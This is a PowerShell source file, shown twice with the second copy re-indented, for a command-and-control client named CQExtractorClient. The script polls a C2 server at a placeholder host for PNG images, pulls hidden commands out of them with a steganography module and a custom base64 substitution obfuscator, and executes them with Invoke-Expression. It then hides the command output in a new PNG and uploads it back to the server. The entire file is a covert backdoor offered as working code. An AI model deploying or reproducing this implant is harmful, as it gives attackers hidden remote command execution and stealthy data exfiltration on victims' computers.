adenkiewicz/CQExtractorClient.ps1

## CQExtractorClient.ps1
Import-Module .\CQExtractor.psm1 -Force

# FIXME: replace with real C2 hostname
$C2 = "http://c2:8080/image.png"
$filename = "image.png"
$filename2 = "image2.png"

class Encoder {
    [system.collections.hashtable]$arr

    Encoder() {
        $this.arr = New-Object system.collections.hashtable

        $this.arr["l"] = ".A"
        $this.arr["1"] = ".B"
        $this.arr["L"] = ".C"
        $this.arr["i"] = ".D"
        $this.arr["I"] = ".E"
        $this.arr["o"] = ".F"
        $this.arr["O"] = ".G"
        $this.arr["0"] = ".H"
        $this.arr["w"] = ".J"
        $this.arr["W"] = ".K"
        $this.arr["="] = ".Q"
    }

    [string] Encode([string]$str) {
        $bytes = [System.Text.Encoding]::Unicode.GetBytes($str)
        $str =[Convert]::ToBase64String($bytes)

        foreach ($key in $this.arr.Keys) {
            $str = $str.Replace($key,$this.arr["$key"])
        }

        return $str
    }

    [string] Decode($str) {
        foreach ($key in $this.arr.Keys) {
            $str = $str.Replace($this.arr["$key"],$key)
        }

        return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))
    }
}

$encoder = new-object Encoder

while (1) {
    $lastEdit = (Get-Item $filename).LastWriteTime
    $request = Invoke-WebRequest -URI $C2 -Method HEAD

    if ([DateTime]($request.Headers.'Last-Modified') -le $lastEdit) {
        # nothing new on the server
        Start-Sleep -s 2

        Continue
    }


    $response = Invoke-WebRequest -URI $C2 -outfile $filename

    $b64 = (Export-PngToString -Path $filename).text
    $cmd = $encoder.Decode($b64)

    if ($cmd) { # Invoke payload
        [string]$result = Invoke-Expression -Command $cmd

        # Save result
        $encoder.encode($result) | Export-StringToPng -Path $filename2

        try {
            Invoke-RestMethod -Method PUT -Uri $C2 -InFile $filename2
        } catch {}
    }

    else {
        write-error "Couldn't decode ($b64/$cmd)"
        try {
            Invoke-RestMethod -Method PUT -Uri $C2
        } catch {}
    }
}
	Import-Module .\CQExtractor.psm1 -Force

	# FIXME: replace with real C2 hostname
	$C2 = "http://c2:8080/image.png"
	$filename = "image.png"
	$filename2 = "image2.png"

	class Encoder {
	[system.collections.hashtable]$arr

	Encoder() {
	$this.arr = New-Object system.collections.hashtable

	$this.arr["l"] = ".A"
	$this.arr["1"] = ".B"
	$this.arr["L"] = ".C"
	$this.arr["i"] = ".D"
	$this.arr["I"] = ".E"
	$this.arr["o"] = ".F"
	$this.arr["O"] = ".G"
	$this.arr["0"] = ".H"
	$this.arr["w"] = ".J"
	$this.arr["W"] = ".K"
	$this.arr["="] = ".Q"
	}

	[string] Encode([string]$str) {
	$bytes = [System.Text.Encoding]::Unicode.GetBytes($str)
	$str =[Convert]::ToBase64String($bytes)

	foreach ($key in $this.arr.Keys) {
	$str = $str.Replace($key,$this.arr["$key"])
	}

	return $str
	}

	[string] Decode($str) {
	foreach ($key in $this.arr.Keys) {
	$str = $str.Replace($this.arr["$key"],$key)
	}

	return [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($str))
	}
	}

	$encoder = new-object Encoder

	while (1) {
	$lastEdit = (Get-Item $filename).LastWriteTime
	$request = Invoke-WebRequest -URI $C2 -Method HEAD

	if ([DateTime]($request.Headers.'Last-Modified') -le $lastEdit) {
	# nothing new on the server
	Start-Sleep -s 2

	Continue
	}


	$response = Invoke-WebRequest -URI $C2 -outfile $filename

	$b64 = (Export-PngToString -Path $filename).text
	$cmd = $encoder.Decode($b64)

	if ($cmd) { # Invoke payload
	[string]$result = Invoke-Expression -Command $cmd

	# Save result
	$encoder.encode($result) \| Export-StringToPng -Path $filename2

	try {
	Invoke-RestMethod -Method PUT -Uri $C2 -InFile $filename2
	} catch {}
	}

	else {
	write-error "Couldn't decode ($b64/$cmd)"
	try {
	Invoke-RestMethod -Method PUT -Uri $C2
	} catch {}
	}
	}